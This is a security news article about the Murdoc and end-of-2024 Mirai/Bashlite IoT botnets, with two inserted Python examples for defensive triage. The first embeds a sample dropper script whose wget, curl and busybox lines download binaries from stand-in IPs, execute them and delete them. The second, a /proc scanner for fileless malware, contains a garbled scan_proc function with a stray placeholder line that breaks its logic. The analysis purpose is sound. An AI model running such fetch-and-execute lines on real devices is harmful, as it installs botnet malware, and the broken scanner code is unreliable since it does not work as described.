Researchers have uncovered two Mirai-based botnets harnessing Internet of Things (IoT) devices to DDoS target organizations around the world.
The Murdoc botnet
Qualys researchers have laid bare the “Murdoc” botnet, consisting of some 1,300 IoT devices infected with a Mirai variant that exploits known vulnerabilities in AVTECH IP cameras and Huawei HG532 routers to compromise them.
“In this latest campaign we note the utilization of ELF file and Shell Script execution, which leads to the deployment of the botnet sample,” the Qualys Threat Research Unit says.
“Each ShellScript is loaded onto devices such as IP cameras, Network devices, and IoT devices, and, in turn, the C2 server loads the new variant of Mirai botnet, i.e., Murdoc Botnet, into the devices.” (The researchers pinpointed more than 100 distinct sets of C2 servers.)
The malware is executed on the target device and its file is then deleted. The infected devices are mostly located in Malaysia, but also in Thailand, Mexico, and Indonesia.
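The infection chain described above (a shell script that fetches an ELF binary, runs it, then removes it) is the classic Mirai-family dropper pattern, and the first triage step for an analyst is pulling the distribution hosts and per-architecture binaries out of that script. The following is an added example, not Qualys' tooling or anything from the Murdoc campaign: the dropper script it parses is constructed here in that style, with invented hosts (documentation-range IPs) and file names.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the style of a Mirai-family dropper: try a series of
# writable directories, fetch one binary per CPU architecture, run it, then
# delete it from disk. Hosts and file names are invented for this example.
SAMPLE_DROPPER = r"""
#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://203.0.113.10/bins/x86 -O x86; chmod +x x86; ./x86 cam; rm -rf x86
wget http://203.0.113.10/bins/mips -O mips; chmod +x mips; ./mips cam; rm -rf mips
busybox wget http://203.0.113.10/bins/arm7 -O arm7; chmod 777 arm7; ./arm7 cam; rm -rf arm7
curl -s http://198.51.100.7/bins/mpsl -o mpsl; chmod +x mpsl; ./mpsl cam; rm -f mpsl
"""

URL_RE = re.compile(r"https?://[^\s;'\"]+")       # download URLs on each line
RM_RE = re.compile(r"\brm\s+-r?f\b")               # self-deletion after execution
WORKDIR_RE = re.compile(r"\bcd\s+(/\S*)")          # candidate working directories


def analyze_dropper(script):
    """Summarise a dropper script: distribution hosts, fetched URLs, the
    architectures it targets (last path component of each URL), the
    directories it tries to work from, and whether it deletes its payloads."""
    urls = URL_RE.findall(script)
    hosts = sorted({urlparse(u).hostname for u in urls})
    arches = sorted({urlparse(u).path.rsplit("/", 1)[-1] for u in urls})
    workdirs = WORKDIR_RE.findall(script)
    return {
        "hosts": hosts,                 # block/monitor these at the perimeter
        "urls": urls,                   # fetch with a sandboxed client for samples
        "architectures": arches,        # multi-arch is typical of IoT botnets
        "workdirs": workdirs,           # where to look for dropped files on a device
        "self_deleting": bool(RM_RE.search(script)),
        "multi_arch": len(arches) > 1,
    }


if __name__ == "__main__":
    for key, value in analyze_dropper(SAMPLE_DROPPER).items():
        print(f"{key}: {value}")
```

Because the script deletes the binary after launching it, the `workdirs` list is where a disk image of a suspected device should be checked for leftovers, while the running process itself is what has to be caught in memory.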
End-of-the-year attacks
Between December 27, 2024, and January 4, 2025, another IoT botnet, made up of devices infected with the Mirai and Bashlite (aka Gafgyt) malware, was used to mount large-scale DDoS attacks targeting companies in Japan, the US, Russia and Europe, Trend Micro researchers recently documented.
“The malware infiltrates the device by exploiting RCE vulnerabilities or weak passwords, then executes a download script on the infected host. This script downloads and executes a second-stage executable file (loader) from a distribution server,” they explained.
The loader then fetches the malware executable from the same server, writes it directly into memory and executes it from there. “During this time, the executable payload is written to the memory image and executed, so that the executable file is not left on the infected host.”
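A payload that is written to memory and executed without ever being a file on disk still shows up in `/proc`: on Linux the `exe` link of such a process points at an anonymous `/memfd:` object, or at a path marked `(deleted)` if the loader unlinked the file after exec. The check below is an added example for hunting that on a compromised router or camera (or on a copied `/proc` tree); it is not Trend Micro's code. The process list it is demonstrated on is constructed here; `classify_exe` is the reusable part.

```python
import os

# What readlink(/proc/<pid>/exe) returns for the two fileless cases:
# anonymous memfd_create() objects, and binaries unlinked after exec.
MEMFD_PREFIX = "/memfd:"
DELETED_SUFFIX = " (deleted)"
# Volatile or world-writable directories Mirai-family droppers cd into.
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/mnt/")

# Constructed sample: (pid, exe link target) pairs as a scan might see them.
SAMPLE_PROCESSES = [
    (1, "/sbin/init"),
    (412, "/usr/sbin/dropbear"),
    (1337, "/memfd:sel (deleted)"),       # loader wrote payload to memfd
    (2048, "/tmp/mips (deleted)"),        # dropped, executed, then rm'd
    (2101, "/var/run/arm7"),              # still on disk, but in a volatile dir
    (3000, "/usr/bin/busybox"),
]


def classify_exe(exe_target):
    """Return why a process executable looks suspicious, or None.
    memfd is checked first because memfd links also carry '(deleted)'."""
    if exe_target.startswith(MEMFD_PREFIX):
        return "executable backed by anonymous memfd (never on disk)"
    if exe_target.endswith(DELETED_SUFFIX):
        return "executable deleted from disk while still running"
    if exe_target.startswith(VOLATILE_DIRS):
        return "executable running from a volatile or world-writable directory"
    return None


def classify_many(processes):
    """Apply classify_exe to (pid, exe) pairs; return [(pid, exe, reason)]."""
    hits = []
    for pid, exe in processes:
        reason = classify_exe(exe)
        if reason:
            hits.append((pid, exe, reason))
    return hits


def scan_proc(proc_root="/proc"):
    """Read every /proc/<pid>/exe under proc_root and classify it."""
    found = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel threads, or not permitted without root
    found.append((int(entry), exe)) if False else None  # placeholder removed below
    return classify_many(_iter_proc(proc_root))


def _iter_proc(proc_root):
    """Yield (pid, exe) for each readable process under proc_root."""
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            yield int(entry), os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue


if __name__ == "__main__":
    for pid, exe, reason in classify_many(SAMPLE_PROCESSES):
        print(f"pid {pid}: {exe}: {reason}")
```

Run as root to see every process. A `(deleted)` hit on its own is not proof of compromise: a daemon that kept running through a package upgrade looks the same, so correlate with the directory, the parent process, and outbound connections before acting. The memfd case has far fewer benign explanations on a router.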
Infected hosts can be directed to carry out different types of DDoS attacks, and they are also offered as SOCKS proxies through an underground proxy service.
Among the infected devices that they’ve been able to pinpoint, most were wireless routers manufactured by TP-Link and Zyxel.
Mirai: A constant threat
The October 2016 DDoS attacks on US-based DNS provider Dyn, which resulted in the temporary unavailability of many popular websites and online services, put the Mirai name on the map.
Earlier that same month, the malware’s source code had been leaked by its creator and, since then, Mirai-based variants proliferated, usually with labels that incorporate the Mirai name.
Cloudflare recently shared that a Mirai-variant botnet was responsible for a 5.6 Tbps UDP DDoS attack – the largest DDoS attack on record – against an internet service provider in East Asia.
The attack originated from over 13,000 IoT devices, the company said. It lasted only 80 seconds and was seamlessly mitigated by Cloudflare’s distributed defense systems.